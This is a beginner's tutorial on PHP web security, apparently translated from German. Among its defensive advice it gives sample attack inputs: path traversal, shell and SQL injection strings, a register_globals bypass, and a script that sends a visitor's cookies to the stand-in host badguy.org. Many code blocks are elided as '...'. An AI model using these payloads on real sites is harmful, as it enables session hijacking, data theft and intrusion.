PHP and other WWW scripting languages permit extensive functionality to be offered to users via the WWW interface. To prevent this functionality from being used to your or somebody else's disadvantage, it is important to avoid security holes right from the start. An important step in this direction is to avoid typical "beginners' mistakes". This article shows you a number of typical traps. You'll also learn how to recognize these (and similar) scenarios in advance and how to avoid them. We finish up with a collection of strategies that help you secure your site and keep it secure.
You have probably read or heard about it in the media: Once again someone has broken into the web server of a large company, organization or government authority. The unknown hackers (also known as "crackers") have defaced the web pages or have caused even worse damage. These are the spectacular cases. Unfortunately, break-ins into web servers are very common - in many cases, the victims never find out. Some examples:
The possibilities of causing damage are almost unlimited. However, one thing that isn't unlimited is the number of basic techniques that malicious hackers can use to gain access to your web server or database.
OK, now you've embarked on your first cautious steps into the exciting realm of PHP programming. And I'm already telling you about all the things that could potentially go wrong. Und ich Brummbär erzähle Ihnen jetzt schon, was dabei alles schief gehen kann. Shouldn't you possibly leave PHP programming to the experts? Don't panic - what you're about to read is useful, easy to digest and possibly news to your run-of-the-mill programmer friend.
At the risk of offending some of my esteemed colleague: The majority of security holes in web sites are can probably be attributed to experienced programmers. Compared to them, you have an advantage as a beginner: You're not set in your ways yet. What do I mean by that?
Quite simply: The vast majority of programmers (even those that learned their craft in the last few years) are trained to make computer programs "run". Once upon a time, when computers still worked away in splendid isolation, one thing had priority: Given a legal input, a program had to produce useful output as quickly as possibly, using as little memory as possible.
Admittedly, it would have been pretty absurd if a user of a DOS PC had deliberately fed junk data to a program in order to have it spit out or modify data that was anyway under his control. Very few people burgle their own homes. If burglars have no way of getting to your home, then there's nothing wrong with leaving a window open. In other words, under weird input your standalone computer software was allowed to do things it wasn't intended for.
With the arrival of the Internet, this is a different ballpark though. Suddenly, the entire world can send data in arbitrary combination and quantity to your machine. If this data reaches one of your programs (e.g., a PHP script), it should be certain that the program will only undertake operations with it that you are happy with. If the data does not conform to your expectations, your program should at least be able to handle them safely. This could be, e.g., the output of an appropriate error message, or an appropriate log entry, or simply by cutting the connection to the troublemaker that has sent you all the rubbish. Let's establish our most important rule: An Internet program must not only do what it is intended for, but must also refrain from doing anything it was not intended for.
Seems obvious? Great. If you're finding the first part a little bit complicated, the second part may sound like an additional headache. However, it doesn't have to be that way: The first part gets considerably easier if you specify exactly what your program may do under which circumstances. In other words: Together with the security holes, the bugs often disappear, too.
You have a web site with a form that contains a select list. Via this list, your users can select a month, i.e., an integer number between 1 and 12. When the form is submitted, this number is passed to your script - STOP!
Why have I just shouted "STOP!"? Because it's the program flow we expect: A user completes our form and submits it to our script. So far, so good. That's the way it's meant to be. However, what about the unanticipated?
Let's have a look at the <form> tag of your form.
... |
This says that your form will be sent to a script called myScript.php when it's submitted. The script is located in the same directory on the web server as the form being shown. Now, what stops us from writing the tag as follows:
... |
That sends the data to a different script on the Internet. Now you may ask why you should want to send your carefully collected data to someone else who probably can't make any sense of it. Good question. You can answer it yourself. Let me continue with a counter-question: If we can send our data to other people's scripts, then what's there to keep other people from writing forms that let them send data to our script myScript.php?
The answer: There's no way to stop them. And that's the problem: We can no longer simply assume that the data that is passed to our script under the variable name of the select list does in fact originate from our list. If a hacker wants it to be that way, the data could be arbitrary. In other words: Apart from numbers, our script myScript.php must also be able to cope with arbitrary other strings.
Putting it on a more general footing: No matter whether your form element is a select list, a checkbox, a text input field or a radio button - the script that receives the form data only receives the (freely chosen) name of the element and the associated value. This value may always be an arbitrary string.
To turn your script into a kind of "zombie" using specially crafted form data, the hacker must exploit functionality that is already present in your script, e.g.:
Let's have a look at a few examples to illustrate this:
Let's have a look at a little greeting card script. I'll give you a little HTML form with the following input elements:
... |
I've left the rest of the HTML code away in order to keep things readable. If you load this page into your browser, you'll get a text input field for your first name, one for the addressee's e-mail address (so he or she can be notified by e-mail) as well as a field where you can enter the actual message. You'll also see a button that lets you send off the electronic postcard. Simple, isn't it?
So far, we haven't made any mistakes - remember, we need some functionality in the script in order to wreak havoc. Let's have a look at excerpts from the associated PHP script myGreetingScript.php:
... |
Once again we've left out a lot here and will instead concentrate on the sore points. How can we get the script do something that the owner didn't expect it to do? Now, let's plot: The site will most likely have a start page (index page). Your browser will tell you what the respective file is called, e.g., index.html. A "real" card greeting will reveal that index.html is located in the directory above the one that stores the greeting data. You only need to compare the URLs of the start page and that of the greeting card (in the e-mail). OK, now consider what happens of the user enters
../index
as the sender's first name. Did you guess right? The file that we're now opening for writing is the file with the path:
/path/to/our/site/greetings/../index.html
However, that's the same as:
/path/to/our/site/index.html
As a result, we have managed to overwrite the site's start page, using the content which we specified in the textarea. How could the site's programmer have prevented this? Very simple: He could have removed all special characters from the sender name before using it as a file name. Even better, he could have used a unique file name generated by the script rather than the user, like so:
... |
In this case, it would have been appropriate to consider what exactly might be contained in our variable $_POST["sender"] and how it might be used. As a matter of principle, it is a bad idea to used browser-supplied variables in file names or in external commands (commands that are invoked via the command line of the server or the database). Watch carefully what might go into include(), include_once(), require(), require_once(), file(), readfile(), file_get_contents(), file_put_contents(), and other commands that read or write files. In most cases, that's not necessary anyway. The next example shows how an external command can be used with malicious intent.
The second "technique" that I'd like to warn you about follows the same lines as the first, but it's potentially even more dangerous. In this example, we're not only mixing parts of file names into our input data, but are even executing commands on the server. The scenario: You have written/purchased/borrowed/stolen a little command line program called horoscope that outputs a horoscope if you hand it a date as command line parameters. Under Windows, that'd work as follows for October 7, 1965 so:
C:\Program Files\SuperHoroscope>horoscope.exe 7 10 1965 |
You now want to make the output of this program available via the web. So you write a little form that lets the user choose day, month and year via three select lists. The lists are called "day", "month" and "year", respectively. Since you already know that these don't absolutely have to be select lists as any hacker worth his salt can just create an arbitrary from form hacking purposes, we'll dump the form and look straight at the code of misconduct:
... |
Once again, our script works as a shining example. If you're using the intended form, you get your horoscope. However, if you use a form with the following hidden input field:
... |
then there'll be about as much left of the server's file system as there was left of the twin towers. The first unprotected variable was not only sufficient to submit all parameters for a successful execution of horoscope.exe, but also to submit a semicolon as a separator and to "inject" a subsequent DELETE command. The other variables may be left empty or may be filled with other variables. In order to protect yourself against such hack attacks, you definitely don't need an army though. You could have simply ensured that your variables only contain numbers that represent a day, month, or year respectively. In the case of deviating data, you could have aborted your script with an error message. Alternatively, there's also the PHP function escapeshellarg(). It defuses all potentially dangerous characters by backslash escapes and places the parameters inside quotes:
... |
However, in this case horoscope.exe must be able to cope with potentially inconsistent parameters, which may still represent a security risk. An input check would definitely the best choice here.
The third trick that I would like to introduce you to here is once again a variant of the two previous security holes. In this case, we're exploiting the PHP interface to our database in order to gain access to a system. Let's suppose that you store the access data for an Internet banking system in a table called accounts in your database. The table has two columns (fields) and in each row, we find the record for a particular account:
AccountNumber | AccountPassword |
145054 | 9nd3qw1y |
873221 | abcd1234 |
... | ... |
548745 | 2afje9r |
... | ... |
Many databases let you access this kind of table using a language known as SQL (perhaps you already know SQL? Great!). An SQL command that lets us, say, retrieve the record for account number 873221 and password abcd1234, looks like this:
select * from accounts where AccountNumber = 873221 and AccountPassword = "abcd1234"
Suppose you're showing your users a login page that lets them log into your system using their account number and password. Then you'll be able to compose the SQL command in your PHP script as follows:
... |
For account number 873221 and the password abcd1234 you'll get exactly the same SQL command as above, except that it's neatly tucked away in a PHP string. This is easily digested by the various query functions in PHP that hand on your command to the desired database.
You can crack such a script even without a special form. In order to get unauthorized access to the account with, say, number 548745, you may even leave the password field empty altogether. Instead, you enter the following string as the account number:
548745 or AccountNumber = 0
That makes your SQL command look like this:
select * from accounts where AccountNumber = 548745 or AccountNumber = 0 and AccountPassword = "" |
In other words: The database will return all records that match at least one of the two following conditions:
The second condition is probably hard to satisfy, but the first one is trivial, at least as long as there is an account with number 548745. Whatever, we're now free to use the account as we wish. Similar tricks may permit you to change account balances, fake transactions, set up accounts, etc.
By the way: We were rather benign here - some databases would have cooperated in the following
548745; |
That way, not only would we be able to access someone else's account, we'd also be able to let our boss (whose salary account number 643894 we've managed to get from someone in Finance over a beer) go insolvent without a trace.
The trick I've just shown you is easily thwarted by putting quotes around the value you're comparing against in your SQL command, i.e.:
... |
This would turn our malicious input into a non-existentent acount number. If you think that this is a little naive, you're not entirely wrong. Firstly: Can we really treat each number as if it was a string? Secondly: What keeps a hacker from entering quotes himself and thus from subverting our security measures? Good questions.
The answer to the first question is: "Not always, but often". If the submitted value must be a number (e.g., in a larger-than or smaller-than comparison), we'll have to check explicitly beforehand whether we've really been given a number.
The answer to the second question depends on your PHP configuration. The important bit here is a configuration setting named magic_quotes_gpc in the configuration file php.ini. It determines whether (single or double) quotes submitted by the browser should be escaped by a preceding backslash. What does this mean? Simple: Imagine that you have a form with a text input field called "dish" that takes the name of a dish. The processing script could - in the simplest case - just echo the specified dish name back to the user:
... |
If you have kept the default setting of magic_quotes_gpc in php.ini, i.e., it's On, the input
Spaghetti "Bolognese" with parmesan cheese |
won't return the original, but
Spaghetti \"Bolognese\" with parmesan cheese
instead. In many cases, though web programmers or system
administrators consider this to be a nuisance and simply turn magic_quotes_gpc
off. In this case, our quotes are a fruitless security precaution. The
hacker could simply enter
548745"; |
That would put us back to square one. If, however, magic_quotes_gpc is still On we're home and hosed - the hacker's quotes have been defused by the backslashes.
How do you check whether magic_quotes_gpc is set to On? If you have installed your own server, you can look it up in php.ini. If you have no control over the server configuration, you can simulate the effect of magic_quotes_gpc On, by entering the following code snippet at the beginning of your script
... |
and by using the "defused" variables $get_safe, $post_safe, and $cookie_safe instead of $_GET, $_POST and $_COOKIE.
Well, you now know the more common trickery. As you have probably noticed, all three examples have always used the same fatal combination:
None of these two ingredients can be entirely avoided with ease. However, you can ensure that submitted data either matches the format that you expect, or that the data is made safe before it is being passed to the function involved. The next section demonstrates how this can be done.
You've already had a sneak preview of defusing browser-supplied data: Before passing values to the command line, you can quarantine them electronically by escapeshellarg(). Before insertion into SQL query strings, you can often take the bite out of dangerous quotes and apostrophes via addslashes() or magic_quotes_gpc On. Sometimes, though, defusing isn't an option. That's the case, e.g., if your command line code doesn't like quotes or if it might behave insecurely under incorrect input, or if you have to compare numerical amounts in SQL. In these case, only an explicit check will help. Such a check may be a good idea in any case, e.g., because you want to log break-in attempts in a log file, or because you would like to give the user feedback about erroneous (but harmless) input.
In principle, you have the choice between two strategies here. The first strategy consists of defining exactly what values a certain input field may contain. If you would like to see a New Zealand postal code, for example, the input should consist of exactly four digits. In the case of an input that has to be from a clearly defined set (such as "January", "February", "March",...), e.g., from a select list or a set of radio buttons, you can check directly whether the input corresponds to one of the values in the set. If you are able to apply this strategy, then that's great - it ensures that you're really only processing values that you expected in the first place.
The downside of the first strategy is that it's sometimes a bit
difficult to define exactly what is to be permitted. If you are asking
for a surname, for example, "d'Artagnan" should probably pass, while
"x'utwfrt" is probably not to be found in anyone's passport and would
thus have to be regarded as suspect. As a result, you may have to
loosen
up and be prepared to accept junk data as long as it's harmless. In the
case of a name, you might want to demand that it may contain
apostrophes, but no double quotes, semicolons or other funny
characters.
This loosening may open back doors, though: Apostrophes, for example,
may serve as replacements for double quotes in SQL commands. Thus, you
need to make sure that things that can contain apostrophes don't turn
up
unprotected in an SQL statement.
The second strategy is to search explicitly for forbidden
characters. E.g., in order to subvert the SQL command in the previous
example (value packaged inside ""), we need a double quote, come what
may. Thus it is sufficient to check our string explicitly for the
presence of such a (double quote) character. The disdavantage of this
strategy is that there may be more than one "problematic" character.
This is in particular the case when the string is eventually going to
be
part of something that's passed to the command line, where - depending
on the shell - there are several characters that act as syntax rather
than data. You could be chasing your tails.
So, how do we implement the two strategies? The magic word here is regular expressions.
Doesn't ring a bell? No worries - we'll explain them right now. In PHP, there are two kinds of regular expressions. The one kind, (POSIX compatible) is only intended for people who have been using them for years and don't want to let go. If you're a beginner in regular expressions, feel free to forget about them and plunge head-on into the second variety, the Perl-compatible regular expressions. All functions in PHP that deal with Perl-compatible regular expressions start with preg_ . The most important function is preg_match(). You'll hand it a pattern (the regular expression) and a variable, and it'll tell you whether the pattern matches the string.
Example: Your form variable postcode is supposed to contain a post code. In New Zealand, that's a four-digit number. In PHP, we can intercept corrupt post codes as follows:
... |
OK, if you've been to my lectures, read my book (in German), or have learned it in some other way, the you'll know the trick: The pattern /^\d{4}$/ consists of two characters known as "delimiters" (the slashes), the anchor ^ that determines that the pattern must match at the beginning of the string and the anchor $ that extends it all the way to the end of the string. Between those two anchors, we want to find digits (\d). To be precise, we want four of them and since \d\d\d\d looks a bit tacky, we use a multiplier ({4}).
If the pattern matches, preg_match() returns the Boolean
value true, which we're negating to false y putting
an exclamation mark in front of the function. In this case, our
variable
has sailed around the reef. If not, we'll let the script die with an
error message. Admittedly, you could use a page with more frills for
that, but this isn't the point here. So far for strategy 1.
If we give a hoot about the content of the form variable postcode as long as it doesn't contain any quotes, we can do it like this:
... |
In this case, we'll set off the alarm if there is a double quote anywhere (=no anchors) in our string. Since the double quote in the pattern is located between two double quotes of the PHP syntax, we have to protect it with a backslash. This time, a positive result is a reason for worry, so we don't need an exclamation mark in front of preg_match().
Now that you know how to do the interception, all you need is a suitable regular expression for your input data, right? The following table shows a few useful expressions:
Use for |
Pattern |
A string that must only contain letters | /^[^\W_\d]*$/ |
A non-empty string that must only contain letters | /^[^\W_\d]+$/ |
A string that must only contain letters and that has to start
with, e.g., hello |
/^hello[^\W_\d]*$/ |
A string that contains a non-personalized New Zealand car license plate | /^([A-Z]{2}\d{1,4}|[A-Z]{3}\d{1,3})$/ |
A string that contains an e-mail address | /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{3}/ |
Of course there are many more patterns - which you'll be able to construct yourself with a bit of practice. As always, getting your hands dirty is the best way to learn. The following little PHP script lets you carry out your own experiments:
<html> |
More information on regular expressions is available from a whole
raft of sources - try this article.
I learnt my basics a while ago using Learning Perl. As
the Perl syntax for regular expressions is the same as in PHP, you can
generally use the expressions there without much of a change. Programming PHP
also
has an extended chapter on regular expressions, but treats the POSIX
variety first, so you may have to turn a few more pages.
This filtering method is suited in particular for data that you expect from select lists or radio buttons. This limits the number of possible values from the start. Filter as follows:
... |
Of course! So far we've only worried about how you're going to guide your user-supplied data safely through your first script. However, there are still a few back doors we need to know and shut.
If you're receiving data frm your users and are storing it in a database, you'll now be aware that you need to protect yourself against SQL code injection, and you'll know how to do that. However, once the data has reached the database, the job isn't over. Sooner or later you'll have to dig the data back out again. At that point, you'll have to ask yourself which values your database fields may have assumed as a result of the user input and whether they can still cause any damage.
If you have already subjected the data to restrictive filtering, the risk may not be that high. If you've relied on magic_quotes_gpc, you'll need to be a bit careful. This is because the backslashes that protect your data will be lost as the data is written to the database. If you have kept the default setting for yet another PHP configuration setting, called magic_quotes_runtime, you'll get a string without backslash escapes when you're reading from the database. Let's suppose that you would like to further process your data in one of the "risky" contexts that we have discussed, you have (once again) a problem. However - you know the solution: addslashes() or renewed filtering and/or packaging, depending on the intended use of the data.
This is a touchy topic - even the PHP developers were struggling with this one, as is evidenced by the security updates during 2002. Buffer overflows in PHP aside (we've hopefully seen the last of them), there are in priciple two possible sources of danger here: the overwriting of existing files (if the user is able to influence the file name - as in our first example) and the clandestine upload of executable files to the server.
The latter is a problem if you wish to make the uploaded files available to the user, such as in photo album applications , shareware uploads, etc. (cf. the donor photo in our lecture example). In this case, you'll have to reveal to the user's browser where - and under which name - the file may be found on the server. If the uploaded file is a PHP file, the user will of course be able to pick what he or she wants to do on your server. A system()-, exec()-,passthru()- or shell_exec() command in this file is able to do anything that a user with the privileges of the web server may do on the server machine: modify files, start or terminate programs,... Not a good idea? I think you understand.
The eval() function or an equivalent to it are found in many programming languages - including PHP. You pass it a string with PHP code, which is then executed by eval(). Here, for example, we try to call the correct function via eval():
... |
A similar risk exists when you use variable names that you can set dynamically in PHP:
... |
This can also get you into trouble, in particular if you publish you code. How's that? Consider the following script:
... |
Of course, your competitor might want to know how much rebate you're valued large-volum customers are getting. Since you've made your code available to the public (without prices and password, of course), generous as you are, your competitor may simply specify "password" as the product, using a homebrew HTML form. At that point, things turn to custard for you - your script "accidentally" exposes the wholesale password as a price, completely ignoring your wish to keep it secret. That permits your competitor to have a look at your discounts next time round.
Of course, that is only one possible way to shoot yourself in the foot using variable variables. Note that, once again, insufficiently checked user input came to the party!
<?php |
If you invoke this script as myScript.php?superuser=1, you don't need to know the superuser password! Why? Well, PHP regards all variables that aren't either empty or equal to 0 as true. In this case, PHP registers the GET variable supplied by the browser at the beginning of the script's execution as $superuser. This means that the second if-statement executes the superuser code!
This is strictly speaking not a PHP security problem, but it is a common one. Imagine the following situation: You use a web application on your site, say a guestbook, that lets your users leave a comment. Before the comment is published, it is saved in a database. When you log into the application, you get to vet the comment. You can then edit it, delete it, or approve it, by submitting the comment back to the application. Because it's all just going into an HTML page, your users are allowed to write what they want, and you have taken care of backslash-escaping all data before it goes into the database. So this should be safe, right? Well, not necessarily.
When the comment is written into the HTML page, it is interpreted as HTML. That is great if you want your users to be able to include bold or italic text, paragraphs, lists, or tables. However, it also lets them include forms and JavaScript, and this is where life becomes dangerous.
Assume for a moment that your comment is printed out like this:
<!-- other HTML of the page goes here ... --> <?php |
Now assume that a malicious user enters this as a comment:
I really like your page, ha, ha <form name=spyform action=www.badguy.org method=post> <input type=hidden name=cookieval> </form> <script> document.spyform.cookieval.value = document.cookie; document.spyform.submit(); </script> |
This displays as I really like your page, ha, ha, but by the time you read this, you cookie (which presumably contains your session token and hence your login credentials for this session) is on its way to the guy who really likes your page. He can then log in as you (hijack your session), and use perhaps other functionalities of your site in order to deface it or get at confidential information.
Hold on a second - how could this happen? Well, the basic problem here is that we allowed the hacker to smuggle invisible HTML and JavaScript code into our browser, which made the browser commit an action that we didn't anticipate and that revealed information about us. Note that none of the above could have been prevented by backslash-escaping quotes!
Variants of this type of attack include reading other information on the page via the document object model (DOM), or modifying actions. For example, if the user comment in the above application is displayed inside a form field for editing/vetting, we could modify the above attack in such a way that we terminate the textarea early by inserting a </textarea> tag, add an onsubmit event handler to the form, which is called when you unsuspectingly approve the lot, and replaces the nice text with a horrible insult - which you have then, seemingly, approved!
This sort of attack is easily prevented by using the htmlentities() function on every bit of user information that reaches the screen:
<!-- other HTML of the page goes here ... --> <?php |
htmlentities() converts characters into their equivalent HTML entity representation whereever possible. This causes the HTML code to be displayed rather than interpreted, and we can see immediately what our admirer is really up to.
Note that it's not sufficient to just get rid of the literal < and > and turn them into < and >. It's just as important to convert quotes. This is because your user data may at times be written into the values of HTML attributes, like so:
<!-- other HTML of the page goes here ... --> <input type="text" name="comment" value="<?php echo $userComment; ?>"> <!-- ... and here --> |
Even backslash-escaped quotes terminate the value string of an attribute, and an attacker can use this to add extra attributes, such as event handlers, which may be used for sinister purposes. For example, you could redirect the submission of a form to a different script, or even write a form via DOM into the page. htmlentities() takes care of HTML tags, entities, and quotes, as does htmlspecialchars(), provided that the ENT_QUOTES flag is set as the second parameter.
Another sore spot that you should watch out for is the writing of user-supplied data of any kind into URLs - ensure that this cannot have other values than the ones you explictly want to allow!
To wrap it all up, let's have a look at a collection of strategies that let you avoid security problems. Some of them may be familiar to you, others may be new to you.